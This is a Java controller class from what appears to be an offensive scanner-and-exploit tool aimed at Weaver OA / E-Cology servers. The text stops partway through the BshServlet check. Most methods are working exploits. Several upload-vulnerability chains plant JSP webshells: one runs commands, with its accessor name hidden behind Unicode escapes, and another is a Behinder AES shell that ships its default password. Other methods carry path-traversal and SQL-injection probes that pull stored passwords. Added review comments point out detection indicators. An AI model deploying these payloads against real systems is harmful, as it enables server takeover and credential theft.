package com.achuna33.Controllers;

import com.achuna33.SupportType.Poc_Exp;
import com.achuna33.SupportType.SupportVul;
import com.achuna33.Utils.Cache;
import com.achuna33.Utils.HttpRequest;
import com.achuna33.Utils.Response;
import com.achuna33.Utils.Utils;
import sun.security.krb5.internal.crypto.Des;

import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.InputStream;
import java.net.MalformedURLException;
import java.nio.charset.StandardCharsets;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

@BasicMapping(uri ="泛微OA")
public class WeaverController  extends Controller implements BasicController{
    /**
     * Vulnerability checks supported by this controller.
     * NOTE(review): never assigned in the code visible here; presumably populated
     * elsewhere by the framework. Confirm before relying on it being non-null.
     */
    public static String[] SupportVul;

    /** Display name of the product family this controller targets. */
    public static String name = "泛微";

    /** Creates the controller; no state is initialised here. */
    public WeaverController() {
    }
    /**
     * Checks (POC) or exercises (EXP) the Weaver OA file-upload path that goes through
     * {@code /Api/portal/fileupload/uploadfile} and then {@code /OfficeServer}.
     *
     * <p>Both modes POST a multipart body (fields {@code secId}, {@code Filedata},
     * {@code plandetailid}) to the upload URL, extract {@code "fileid":<digits>} from the
     * response body and POST that id to {@code /OfficeServer} inside an {@code INSERTIMAGE}
     * option string. POC uploads the marker text {@code helloword} under a random
     * {@code .jsp} name and reports the target as vulnerable when a GET of that name
     * returns 200 with the marker in the body. EXP uploads a payload under a {@code .jpg}
     * name and then a {@code .jsp} that statically includes it.
     *
     * <p>Review notes:
     * <ul>
     *   <li>Every request carries the constant header {@code x-forwarded-for: 127.0.0.1} and
     *       the constant multipart boundary {@code ----WebKitFormBoundarymVk33liI64J7GQaK};
     *       both are fixed strings that can be matched in proxy or WAF logs.</li>
     *   <li>No cookie or credential header is set in this method.</li>
     *   <li>This method issues no request that removes what it uploaded, so a POC run also
     *       leaves a file on the checked host.</li>
     * </ul>
     *
     * @param type   selects the POC or EXP branch
     * @param target base URL; request paths are appended by plain string concatenation
     * @param args   optional; in EXP mode {@code args[0]} is read as a local file path whose
     *               content replaces the built-in payload
     * @throws MalformedURLException declared on the signature; presumably raised when an
     *                               HttpRequest is built from a malformed target (confirm)
     */
    @VulnerabilityDescriptionMapping(Description = "泛微OA uploadfile 任意文件上传",SupportVulType = com.achuna33.SupportType.SupportVul.UploadFile)
    public void vul_uploadfile(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        Cache.uiController.logTextArea.appendText("\n[*]开始检测：  泛微OA uploadfile 任意文件上传");
        String url = "/Api/portal/fileupload/uploadfile";
        String url2 = "/OfficeServer";
        // Multipart template. The literals "Shellcode" and "config_application.jsp" are
        // placeholders that are substituted with String.replace further down.
        String data = "------WebKitFormBoundarymVk33liI64J7GQaK\r\n" +
                "Content-Disposition: form-data; name=\"secId\"\r\n"+
                "\r\n"+
                "1\r\n"+
                "------WebKitFormBoundarymVk33liI64J7GQaK\r\n"+
                "Content-Disposition: form-data; name=\"Filedata\"; filename=\"config_application.jsp\"\r\n" +
                "\r\n" +
                "Shellcode\r\n" +
                "------WebKitFormBoundarymVk33liI64J7GQaK\r\n"+
                "Content-Disposition: form-data; name=\"plandetailid\"\r\n"+
                "\r\n"+
                "1\r\n"+
                "------WebKitFormBoundarymVk33liI64J7GQaK\r\n";
        // Body for /OfficeServer; "TFASDID" is the placeholder for the extracted file id.
        String data1 = "------WebKitFormBoundarymVk33liI64J7GQaK\r\n" +
                "Content-Disposition: form-data; name=\"aaa\"\r\n"+
                "\r\n" +
                "{'OPTION':'INSERTIMAGE','isInsertImageNew':'1','imagefileid4pic':'TFASDID'}\r\n"+
                "------WebKitFormBoundarymVk33liI64J7GQaK";
        switch (type){
            case EXP:
                String path = null;
                String mypayload = null;
                try {
                    // Optional custom payload: args[0] is treated as a local file path.
                    path = (String) args[0];
                    try {
                        byte[] bytes = Utils.readFile(path);
                        // Decoded with the platform default charset (no charset argument).
                        mypayload = new String(bytes);
                    }catch (Exception e){
                        WriteExpLog("\n [-] 文件读取失败");
                    }
                }catch (Exception e){
                    // Swallowed on purpose: a missing or non-String args[0] silently
                    // selects the built-in payload below.
                }
                // Built-in JSP payload: passes request parameter "i" to Runtime.exec and
                // prints the process output. The accessor name is spelled with Unicode
                // escapes, so a plain-text search for it in uploaded files will not match;
                // the Runtime.getRuntime().exec call is the more reliable signature.
                String payload = "<% java.io.InputStream in = Runtime.getRuntime().exec(request.\\u0067\\u0065\\u0074\\u0050\\u0061\\u0072\\u0061\\u006d\\u0065\\u0074\\u0065\\u0072(\"i\")).getInputStream();\n" +
                        "\tint a = -1; byte[] b = new byte[2048]; \n" +
                        "\twhile((a=in.read(b))!=-1){\n" +
                        "\t out.println(new String(b)); }  %>";
                // Second JSP: page directives plus a static include of "1.jpg" (renamed
                // below to the stage-1 file name). Content stored under an image extension
                // is therefore still compiled as JSP, so extension checks alone do not
                // neutralise this pattern.
                String payload2 = "<%@ page language=\"java\" contentType=\"text/html;charset=UTF-8\" pageEncoding=\"UTF-8\"%>\n" +
                        "<%@ page import=\"java.io.*\"%>\n" +
                        "<%@ page import=\"java.lang.reflect.Constructor\" %>\n" +
                        "<%@ page import=\"java.lang.reflect.Method\" %>\n" +
                        "<%@ include file = \"1.jpg\" %>";

                if (mypayload!=null){
                    payload = mypayload;
                }else {
                    WriteExpLog("\n [*] 默认为特制webshell");
                }
                // Stage 1: upload the payload under a .jpg file name.
                String shellpath = Utils.getRandomString(4)+".jsp";
                HttpRequest httpRequest3 = new HttpRequest(target+url);
                HttpRequest httpRequest4 = new HttpRequest(target+url2);
                httpRequest3.addHeaders("Content-Type","multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK");
                httpRequest3.addHeaders("x-forwarded-for","127.0.0.1");
                String data3 = data.replace("Shellcode",payload);
                httpRequest4.addHeaders("Content-Type","multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK");
                httpRequest4.addHeaders("x-forwarded-for","127.0.0.1");
                data3 = data3.replace("config_application.jsp",shellpath.replace(".jsp",".jpg"));
                Response result3 = httpRequest3.Post(data3);
                // "[0-9]*" also matches zero digits, so a bare "fileid": in the response
                // still passes find() and yields an empty id.
                Pattern pattern1 = Pattern.compile("\"fileid\":[0-9]*");
                Matcher id1 = pattern1.matcher(result3.responseBody);
                String id2;
                if (id1.find()){
                    id2 = id1.group(0);
                    httpRequest4.Post(data1.replace("TFASDID",id2.replace("\"fileid\":","")));
                }
                else{
                    // Logged when no file id was found, i.e. the follow-up request is skipped.
                    WriteLog("第二个请求失败");
                }
                // Stage 2: upload the .jsp whose only job is to include the stage-1 file.
                HttpRequest httpRequest5 = new HttpRequest(target+url);
                // NOTE(review): httpRequest6 is configured but never sent; the follow-up
                // below reuses httpRequest4, which targets the same URL with the same headers.
                HttpRequest httpRequest6 = new HttpRequest(target+url2);
                httpRequest5.addHeaders("Content-Type","multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK");
                httpRequest5.addHeaders("x-forwarded-for","127.0.0.1");
                String data4 = data.replace("Shellcode",payload2.replace("1.jpg",shellpath.replace(".jsp",".jpg")));
                data4 = data4.replace("config_application.jsp",shellpath);
                Response result4 = httpRequest5.Post(data4);
                httpRequest6.addHeaders("Content-Type","multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK");
                httpRequest6.addHeaders("x-forwarded-for","127.0.0.1");
                Pattern pattern2 = Pattern.compile("\"fileid\":[0-9]*");
                Matcher id3 = pattern2.matcher(result4.responseBody);
                String id4;
                if (id3.find()){
                    id4 = id3.group(0);
                    httpRequest4.Post(data1.replace("TFASDID",id4.replace("\"fileid\":","")));
                }
                else{
                    WriteLog("第二个请求失败");
                }




                // Verification: fetches the .jpg from stage 1. The .jsp URL written to
                // the log below is not itself requested by this method.
                Response result1 = new HttpRequest(target +"/"+shellpath.replace(".jsp",".jpg")).Get("");
                if(result1.statusCode==200){
                    WriteExpLog("\n[*] shell path:\n"+target +"/"+shellpath+"?i=cmd.exe /c echo 123\r\n");
                    // Usage hint printed for the operator; nothing in this method sends it.
                    WriteExpLog("cmd.exe /c forfiles /p %COMSPEC:~0,19% /s /c \"cmd /c @file -c  command;exit\" /m po*l.*e");
                }else {
                    WriteExpLog("\n 访问失败:\n"+target +"/"+shellpath);
                    WriteExpLog("\n 请验证POC 可靠性 或 EXP免杀性");

                }
                break;
            case POC:
                String targetUrl = target+url;
                String random = Utils.getRandomString(4)+".jsp";
                HttpRequest httpRequest = new HttpRequest(targetUrl);
                // NOTE(review): header with empty name and value; looks like leftover
                // scaffolding. Confirm how HttpRequest treats it.
                httpRequest.addHeaders("","");
                httpRequest.addHeaders("Content-Type","multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK");
                httpRequest.addHeaders("x-forwarded-for","127.0.0.1");
                // The marker file contains only the text "helloword".
                data = data.replace("Shellcode","helloword");
                data = data.replace("config_application.jsp",random);
                HttpRequest httpRequest1 =  new HttpRequest(target+url2);
                httpRequest1.addHeaders("Content-Type","multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK");
                httpRequest1.addHeaders("x-forwarded-for","127.0.0.1");
                Response result2 =httpRequest.Post(data);
                Pattern pattern = Pattern.compile("\"fileid\":[0-9]*");
                Matcher id = pattern.matcher(result2.responseBody);
                String ids;
                if (id.find()){
                    ids = id.group(0);
                    httpRequest1.Post(data1.replace("TFASDID",ids.replace("\"fileid\":","")));
                }

//                System.out.println(ids);
//                httpRequest1.Post(data1);
                // Positive only when the marker text comes back from the uploaded name.
                // The marker file is not removed afterwards.
                Response result = new HttpRequest(target+"/"+random).Get("");
                if(result.statusCode==200 && result.responseBody.contains("helloword")){
                    WriteLog("\n [*]存在漏洞");
                    WriteLog("\n [*]写入地址："+target+"/"+random );
                }else {
                    WriteLog("\n[-] 不存在漏洞");
                }
        }
    }
    /**
     * Checks (POC) or exercises (EXP) the Weaver OA file-upload path that goes through
     * {@code /workrelate/plan/util/uploaderOperate.jsp} and then {@code /OfficeServer}.
     *
     * <p>The flow mirrors the other two-step upload check in this class: POST a multipart
     * body to the upload URL, extract {@code fileid=<digits>} from the response body, POST
     * that id to {@code /OfficeServer}, then GET the uploaded name. POC uploads the marker
     * text {@code helloword}; EXP uploads a payload under a {@code .jpg} name followed by a
     * {@code .jsp} that statically includes it.
     *
     * <p>Review notes:
     * <ul>
     *   <li>Every request carries the constant header {@code x-forwarded-for: 127.0.0.1} and
     *       the constant multipart boundary {@code ----WebKitFormBoundarymVk33liI64J7GQaK};
     *       both are fixed strings that can be matched in proxy or WAF logs.</li>
     *   <li>No cookie or credential header is set in this method.</li>
     *   <li>This method issues no request that removes what it uploaded, so a POC run also
     *       leaves a file on the checked host.</li>
     * </ul>
     *
     * @param type   selects the POC or EXP branch
     * @param target base URL; request paths are appended by plain string concatenation
     * @param args   optional; in EXP mode {@code args[0]} is read as a local file path whose
     *               content replaces the built-in payload
     * @throws MalformedURLException declared on the signature; presumably raised when an
     *                               HttpRequest is built from a malformed target (confirm)
     */
    @VulnerabilityDescriptionMapping(Description = "泛微OA uploaderOperate.jsp 任意文件上传",SupportVulType = com.achuna33.SupportType.SupportVul.UploadFile)
    public void vul_uploaderOperate(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        Cache.uiController.logTextArea.appendText("\n[*]开始检测：  泛微OA uploaderOperate.jsp 任意文件上传");
        String url = "/workrelate/plan/util/uploaderOperate.jsp";
        String url2 = "/OfficeServer";
        // Multipart template. The literals "Shellcode" and "config_application.jsp" are
        // placeholders that are substituted with String.replace further down.
        String data = "------WebKitFormBoundarymVk33liI64J7GQaK\r\n" +
                "Content-Disposition: form-data; name=\"secId\"\r\n"+
                "\r\n"+
                "1\r\n"+
                "------WebKitFormBoundarymVk33liI64J7GQaK\r\n"+
                "Content-Disposition: form-data; name=\"Filedata\"; filename=\"config_application.jsp\"\r\n" +
                "\r\n" +
                "Shellcode\r\n" +
                "------WebKitFormBoundarymVk33liI64J7GQaK\r\n"+
                "Content-Disposition: form-data; name=\"plandetailid\"\r\n"+
                "\r\n"+
                "1\r\n"+
                "------WebKitFormBoundarymVk33liI64J7GQaK\r\n";
        // Body for /OfficeServer; "TFASDID" is the placeholder for the extracted file id.
        String data1 = "------WebKitFormBoundarymVk33liI64J7GQaK\r\n" +
                "Content-Disposition: form-data; name=\"aaa\"\r\n"+
                "\r\n" +
                "{'OPTION':'INSERTIMAGE','isInsertImageNew':'1','imagefileid4pic':'TFASDID'}\r\n"+
                "------WebKitFormBoundarymVk33liI64J7GQaK";
        switch (type){
            case EXP:
                String path = null;
                String mypayload = null;
                try {
                    // Optional custom payload: args[0] is treated as a local file path.
                    path = (String) args[0];
                    try {
                        byte[] bytes = Utils.readFile(path);
                        // Decoded with the platform default charset (no charset argument).
                        mypayload = new String(bytes);
                    }catch (Exception e){
                        WriteExpLog("\n [-] 文件读取失败");
                    }
                }catch (Exception e){
                    // Swallowed on purpose: a missing or non-String args[0] silently
                    // selects the built-in payload below.
                }
                // Built-in JSP payload: passes request parameter "i" to Runtime.exec and
                // prints the process output. The accessor name is spelled with Unicode
                // escapes, so a plain-text search for it in uploaded files will not match;
                // the Runtime.getRuntime().exec call is the more reliable signature.
                String payload = "<% java.io.InputStream in = Runtime.getRuntime().exec(request.\\u0067\\u0065\\u0074\\u0050\\u0061\\u0072\\u0061\\u006d\\u0065\\u0074\\u0065\\u0072(\"i\")).getInputStream();\n" +
                        "\tint a = -1; byte[] b = new byte[2048]; \n" +
                        "\twhile((a=in.read(b))!=-1){\n" +
                        "\t out.println(new String(b)); }  %>";
                // Second JSP: page directives plus a static include of "1.jpg" (renamed
                // below to the stage-1 file name). Content stored under an image extension
                // is therefore still compiled as JSP, so extension checks alone do not
                // neutralise this pattern.
                String payload2 = "<%@ page language=\"java\" contentType=\"text/html;charset=UTF-8\" pageEncoding=\"UTF-8\"%>\n" +
                        "<%@ page import=\"java.io.*\"%>\n" +
                        "<%@ page import=\"java.lang.reflect.Constructor\" %>\n" +
                        "<%@ page import=\"java.lang.reflect.Method\" %>\n" +
                        "<%@ include file = \"1.jpg\" %>";

                if (mypayload!=null){
                    payload = mypayload;
                }else {
                    WriteExpLog("\n [*] 默认为特制webshell");
                }
                // Stage 1: upload the payload under a .jpg file name.
                String shellpath = Utils.getRandomString(4)+".jsp";
                HttpRequest httpRequest3 = new HttpRequest(target+url);
                HttpRequest httpRequest4 = new HttpRequest(target+url2);
                httpRequest3.addHeaders("Content-Type","multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK");
                httpRequest3.addHeaders("x-forwarded-for","127.0.0.1");
                String data3 = data.replace("Shellcode",payload);
                httpRequest4.addHeaders("Content-Type","multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK");
                httpRequest4.addHeaders("x-forwarded-for","127.0.0.1");
                data3 = data3.replace("config_application.jsp",shellpath.replace(".jsp",".jpg"));
                Response result3 = httpRequest3.Post(data3);
                // "[0-9]*" also matches zero digits, so a bare "fileid=" in the response
                // still passes find() and yields an empty id.
                Pattern pattern1 = Pattern.compile("fileid=[0-9]*");
                Matcher id1 = pattern1.matcher(result3.responseBody);
                String id2;
                if (id1.find()){
                    id2 = id1.group(0);
                    httpRequest4.Post(data1.replace("TFASDID",id2.replace("fileid=","")));
                }
                else{
                    // Logged when no file id was found, i.e. the follow-up request is skipped.
                    WriteLog("第二个请求失败");
                }
                // Stage 2: upload the .jsp whose only job is to include the stage-1 file.
                HttpRequest httpRequest5 = new HttpRequest(target+url);
                // NOTE(review): httpRequest6 is configured but never sent; the follow-up
                // below reuses httpRequest4, which targets the same URL with the same headers.
                HttpRequest httpRequest6 = new HttpRequest(target+url2);
                httpRequest5.addHeaders("Content-Type","multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK");
                httpRequest5.addHeaders("x-forwarded-for","127.0.0.1");
                String data4 = data.replace("Shellcode",payload2.replace("1.jpg",shellpath.replace(".jsp",".jpg")));
                data4 = data4.replace("config_application.jsp",shellpath);
                Response result4 = httpRequest5.Post(data4);
                httpRequest6.addHeaders("Content-Type","multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK");
                httpRequest6.addHeaders("x-forwarded-for","127.0.0.1");
                Pattern pattern2 = Pattern.compile("fileid=[0-9]*");
                Matcher id3 = pattern2.matcher(result4.responseBody);
                String id4;
                if (id3.find()){
                    id4 = id3.group(0);
                    httpRequest4.Post(data1.replace("TFASDID",id4.replace("fileid=","")));
                }
                else{
                    WriteLog("第二个请求失败");
                }




                // Verification: fetches the .jpg from stage 1. The .jsp URL written to
                // the log below is not itself requested by this method.
                Response result1 = new HttpRequest(target +"/"+shellpath.replace(".jsp",".jpg")).Get("");
                if(result1.statusCode==200){
                    WriteExpLog("\n[*] shell path:\n"+target +"/"+shellpath+"?i=cmd.exe /c echo 123");
                    // (disabled) an extra log line describing the POST form of the same parameter
                }else {
                    WriteExpLog("\n 访问失败:\n"+target +"/"+shellpath);
                    WriteExpLog("\n 请验证POC 可靠性 或 EXP免杀性");

                }
                break;
            case POC:
                String targetUrl = target+url;
                String random = Utils.getRandomString(4)+".jsp";
                HttpRequest httpRequest = new HttpRequest(targetUrl);
                // NOTE(review): header with empty name and value; looks like leftover
                // scaffolding. Confirm how HttpRequest treats it.
                httpRequest.addHeaders("","");
                httpRequest.addHeaders("Content-Type","multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK");
                httpRequest.addHeaders("x-forwarded-for","127.0.0.1");
                // The marker file contains only the text "helloword".
                data = data.replace("Shellcode","helloword");
                data = data.replace("config_application.jsp",random);
                HttpRequest httpRequest1 =  new HttpRequest(target+url2);
                httpRequest1.addHeaders("Content-Type","multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK");
                httpRequest1.addHeaders("x-forwarded-for","127.0.0.1");
                Response result2 =httpRequest.Post(data);
                Pattern pattern = Pattern.compile("fileid=[0-9]*");
                Matcher id = pattern.matcher(result2.responseBody);
                String ids;
                if (id.find()){
                    ids = id.group(0);
                    httpRequest1.Post(data1.replace("TFASDID",ids.replace("fileid=","")));
                }

//                System.out.println(ids);
//                httpRequest1.Post(data1);
                // Positive only when the marker text comes back from the uploaded name.
                // The marker file is not removed afterwards.
                Response result = new HttpRequest(target+"/"+random).Get("");
                if(result.statusCode==200 && result.responseBody.contains("helloword")){
                    WriteLog("\n [*]存在漏洞");
                    WriteLog("\n [*]写入地址："+target+"/"+random );
                }else {
                    WriteLog("\n[-] 不存在漏洞");
                }
        }
    }
    /**
     * Probes {@code /weaver/ln.FileDownload} for arbitrary file read by requesting
     * {@code ../ecology/WEB-INF/web.xml} through the {@code fpath} query parameter.
     *
     * <p>POC mode reports the target as vulnerable when the response is HTTP 200 and the
     * body contains the substring {@code pattern}; every other mode does nothing.
     * NOTE(review): {@code pattern} is presumably meant to hit the url-pattern elements of a
     * web.xml, but it is a short, common word and can also appear on unrelated pages, so a
     * positive result should be confirmed manually.
     *
     * <p>Defensive view: the request is recognisable by a {@code fpath} value containing
     * {@code ../}; rejecting traversal sequences in that parameter is the relevant control.
     *
     * @param type   selects the POC branch; EXP is not implemented
     * @param target base URL; the probe path is appended by plain string concatenation
     * @param args   unused
     * @throws MalformedURLException declared on the signature; presumably raised when the
     *                               HttpRequest is built from a malformed target (confirm)
     */
    @VulnerabilityDescriptionMapping(
            Description = "泛微OA ln.FileDownload 任意文件读取漏洞",
            SupportVulType = com.achuna33.SupportType.SupportVul.信息泄露)
    public void vul_ln_FileDownload(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        WriteLog("\n[*]开始检测：  泛微OA ln.FileDownload 任意文件读取漏洞");

        final String probeUrl = target + "/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml";
        switch (type) {
            case POC:
                Response reply = new HttpRequest(probeUrl).Get("");
                boolean looksLikeWebXml = reply.statusCode == 200 && reply.responseBody.contains("pattern");
                if (!looksLikeWebXml) {
                    WriteLog("\n 不存在漏洞");
                } else {
                    WriteLog("\n 存在漏洞");
                    WriteLog("\n 访问地址：" + probeUrl);
                }
                break;
            default:
                // EXP has no implementation for this check.
                break;
        }
    }
    /**
     * Probes {@code /js/hrm/getdata.jsp} for SQL injection by passing a complete SELECT
     * statement in the {@code sql} query parameter together with {@code cmd=getSelectAllId}.
     *
     * <p>POC mode reports the target as vulnerable on any HTTP 200; the response body is
     * never inspected. A host that answers 200 for unknown paths (custom error page, login
     * redirect rendered inline) is therefore reported as vulnerable as well, so results need
     * manual confirmation.
     *
     * <p>The probe statement selects the {@code password} column of
     * {@code HrmResourceManager}: against an affected host the response carries credential
     * data even though this method discards it. Defensive view: any request to this
     * endpoint with a {@code sql} parameter is worth alerting on.
     *
     * @param type   selects the POC branch; EXP is not implemented
     * @param target base URL; the probe path is appended by plain string concatenation
     * @param args   unused
     * @throws MalformedURLException declared on the signature; presumably raised when the
     *                               HttpRequest is built from a malformed target (confirm)
     */
    @VulnerabilityDescriptionMapping(
            Description = "泛微OA getdata.jsp SQL注入漏洞",
            SupportVulType = com.achuna33.SupportType.SupportVul.SQLInjection)
    public void vul_getdataSqlInjection(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        WriteLog("\n[*]开始检测：  泛微OA getdata.jsp SQL注入漏洞");

        final String endpoint = "/js/hrm/getdata.jsp";
        switch (type) {
            case POC:
                String probeUrl = target + endpoint
                        + "?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager";
                Response reply = new HttpRequest(probeUrl).Get("");
                if (reply.statusCode != 200) {
                    WriteLog("\n 不存在漏洞");
                } else {
                    WriteLog("\n 存在漏洞");
                    WriteLog("\n 访问地址：" + probeUrl);
                }
                break;
            default:
                // EXP has no implementation for this check.
                break;
        }
    }

/**
 * Checks (POC) or exercises (EXP) the Weaver OA file upload at
 * {@code /page/exportImport/uploadOperation.jsp}.
 *
 * <p>Both modes POST a single-part multipart body (field {@code file}) under a random
 * {@code .jsp} name and then GET {@code /page/exportImport/fileTransfer/<name>}. POC
 * uploads the marker text {@code helloword} and requires it in the fetched body; EXP
 * uploads a payload and only checks for HTTP 200.
 *
 * <p>Review notes:
 * <ul>
 *   <li>Requests carry the constant header {@code x-forwarded-for: 127.0.0.1} and the
 *       constant boundary {@code ----WebKitFormBoundary6XgyjB6SeCArD3Hc}; both can be matched
 *       in proxy or WAF logs.</li>
 *   <li>No cookie or credential header is set in this method.</li>
 *   <li>This method issues no request that removes what it uploaded, so a POC run also
 *       leaves a file on the checked host.</li>
 *   <li>New {@code .jsp} files appearing under {@code /page/exportImport/fileTransfer/} are
 *       the on-disk trace of either mode.</li>
 * </ul>
 *
 * @param type   selects the POC or EXP branch
 * @param target base URL; request paths are appended by plain string concatenation
 * @param args   optional; in EXP mode {@code args[0]} is read as a local file path whose
 *               content replaces the built-in payload
 * @throws MalformedURLException declared on the signature; presumably raised when an
 *                               HttpRequest is built from a malformed target (confirm)
 */
@VulnerabilityDescriptionMapping(Description = "泛微OA uploadOperation.jsp 任意文件上传",SupportVulType = com.achuna33.SupportType.SupportVul.UploadFile)
public void vul_uploadOperation(Poc_Exp type, String target, Object... args) throws MalformedURLException {
    WriteLog("\n[*]开始检测：  泛微OA uploadOperation.jsp 任意文件上传");
    String url = "/page/exportImport/uploadOperation.jsp";
    // Multipart template. The literals "Shellcode" and "test.jsp" are placeholders that
    // are substituted with String.replace further down.
    String data = "------WebKitFormBoundary6XgyjB6SeCArD3Hc\r\n" +
            "Content-Disposition: form-data; name=\"file\"; filename=\"test.jsp\"\r\n" +
            "Content-Type: application/octet-stream\r\n" +
            "\r\n" +
            "Shellcode\r\n" +
            "------WebKitFormBoundary6XgyjB6SeCArD3Hc--\r\n";
    switch (type){
        case EXP:
            String path = null;
            String mypayload = null;
            try {
                // Optional custom payload: args[0] is treated as a local file path.
                path = (String) args[0];
                try {
                    byte[] bytes = Utils.readFile(path);
                    // Decoded with the platform default charset (no charset argument).
                    mypayload = new String(bytes);
                }catch (Exception e){
                    WriteExpLog("\n [*] 文件读取失败");
                }
            }catch (Exception e){
                // Swallowed on purpose: a missing or non-String args[0] silently
                // selects the built-in payload below.
            }
            // Built-in payload: a JSP that AES-decrypts the POST body with a hard-coded key
            // and loads the result as a class. The log line below names it as the Behinder
            // shell with its default password. The key literal in this string is a
            // ready-made indicator when hunting through uploaded .jsp files.
            String payload = "<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals(\"POST\")){String k=\"e45e329feb5d925b\";/*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/session.putValue(\"u\",k);Cipher c=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec(k.getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>\n";

            if (mypayload!=null){
                payload = mypayload;
            }else {
                WriteExpLog("\n [*] 默认shell 为冰蝎shell 密码 rebeyond");
            }
            String shellpath = Utils.getRandomString(4)+".jsp";
            HttpRequest httpRequest3 = new HttpRequest(target+url);
            httpRequest3.addHeaders("Content-Type","multipart/form-data; boundary=----WebKitFormBoundary6XgyjB6SeCArD3Hc");
            httpRequest3.addHeaders("x-forwarded-for","127.0.0.1");
            data = data.replace("Shellcode",payload);
            data = data.replace("test.jsp",shellpath);

            // The upload response is not inspected; success is judged by the GET below.
            httpRequest3.Post(data);

            // A 200 here is the only success criterion; the body is not checked.
            Response result1 = new HttpRequest(target +"/page/exportImport/fileTransfer/"+shellpath).Get("");
            if(result1.statusCode==200){
                WriteExpLog("\n[*] shell path:\n"+target +"/page/exportImport/fileTransfer/"+shellpath);
            }else {
                WriteExpLog("\n 访问失败:\n"+target +"/page/exportImport/fileTransfer/"+shellpath);
                WriteExpLog("\n 请验证POC 可靠性 或 EXP免杀性");

            }
            break;
        case POC:
            String targetUrl = target+url;
            String random = Utils.getRandomString(4)+".jsp";
            HttpRequest httpRequest = new HttpRequest(targetUrl);
            httpRequest.addHeaders("Content-Type","multipart/form-data; boundary=----WebKitFormBoundary6XgyjB6SeCArD3Hc");
            httpRequest.addHeaders("x-forwarded-for","127.0.0.1");
            // The marker file contains only the text "helloword".
            data = data.replace("Shellcode","helloword");
            data = data.replace("test.jsp",random);
            httpRequest.Post(data);
            // Positive only when the marker text comes back from the uploaded name.
            // The marker file is not removed afterwards.
            Response result = new HttpRequest(target+"/page/exportImport/fileTransfer/"+random).Get("");
            if(result.statusCode==200 && result.responseBody.contains("helloword")){
                WriteLog("\n 存在漏洞");
                WriteLog("\n 写入地址："+target+"/page/exportImport/fileTransfer/"+random );
            }else {
                WriteLog("\n 不存在漏洞");
            }
    }
}

/**
 * Probes the E-Cology {@code LoginSSO.jsp} SQL injection (CNVD-2021-33202) with a UNION
 * SELECT appended to the {@code id} query parameter.
 *
 * <p>POC mode reports the target as vulnerable on any HTTP 200; the response body is never
 * inspected, so a host that answers 200 for arbitrary paths is reported as vulnerable too
 * and results need manual confirmation.
 *
 * <p>The probe statement selects the {@code password} column of {@code HrmResourceManager}:
 * against an affected host the response carries credential data even though this method
 * discards it. Defensive view: the request path nests {@code /login/LoginSSO.jsp} under
 * {@code /upgrade/detail.jsp}, which is a distinctive string to match in access logs.
 *
 * @param type   selects the POC branch; EXP is not implemented
 * @param target base URL; the probe path is appended by plain string concatenation
 * @param args   unused
 * @throws MalformedURLException declared on the signature; presumably raised when the
 *                               HttpRequest is built from a malformed target (confirm)
 */
@VulnerabilityDescriptionMapping(
        Description = "泛微OA E-Cology LoginSSO.jsp SQL注入漏洞 CNVD-2021-33202",
        SupportVulType = com.achuna33.SupportType.SupportVul.SQLInjection)
public void vul_LoginSSOSqlInjection(Poc_Exp type, String target, Object... args) throws MalformedURLException {
    WriteLog("\n[*]开始检测：  泛微OA E-Cology LoginSSO.jsp SQL注入漏洞 CNVD-2021-33202");

    final String probeUrl = target
            + "/upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20password%20as%20id%20from%20HrmResourceManager";
    switch (type) {
        case POC:
            Response reply = new HttpRequest(probeUrl).Get("");
            if (reply.statusCode != 200) {
                WriteLog("\n 不存在漏洞");
            } else {
                WriteLog("\n 存在漏洞");
                WriteLog("\n 访问地址：" + probeUrl);
            }
            break;
        default:
            // EXP has no implementation for this check.
            break;
    }
}
/**
 * Checks whether the E-Cology BshServlet endpoint (CNVD-2019-32204) is reachable at
 * {@code /weaver/bsh.servlet.BshServlet/}.
 *
 * <p>POC mode sends a plain GET with no script and reports the target as vulnerable on any
 * HTTP 200; the response body is never inspected. This establishes exposure of the path at
 * most, and a host that answers 200 for arbitrary paths is reported as vulnerable too.
 *
 * <p>Defensive view: the servlet path is a fixed string, so blocking or alerting on it at
 * the reverse proxy covers this check.
 *
 * @param type   selects the POC branch; EXP is not implemented
 * @param target base URL; the probe path is appended by plain string concatenation
 * @param args   unused
 * @throws MalformedURLException declared on the signature; presumably raised when the
 *                               HttpRequest is built from a malformed target (confirm)
 */
@VulnerabilityDescriptionMapping(
        Description = "泛微OA E-Cology BshServlet 远程代码执行漏洞 CNVD-2019-32204",
        SupportVulType = com.achuna33.SupportType.SupportVul.RuntimeExec)
public void vul_BshServlet(Poc_Exp type, String target, Object... args) throws MalformedURLException {
    WriteLog("\n[*]开始检测：  泛微OA E-Cology BshServlet 远程代码执行漏洞 CNVD-2019-32204");

    final String probeUrl = target + "/weaver/bsh.servlet.BshServlet/";
    switch (type) {
        case POC:
            Response reply = new HttpRequest(probeUrl).Get("");
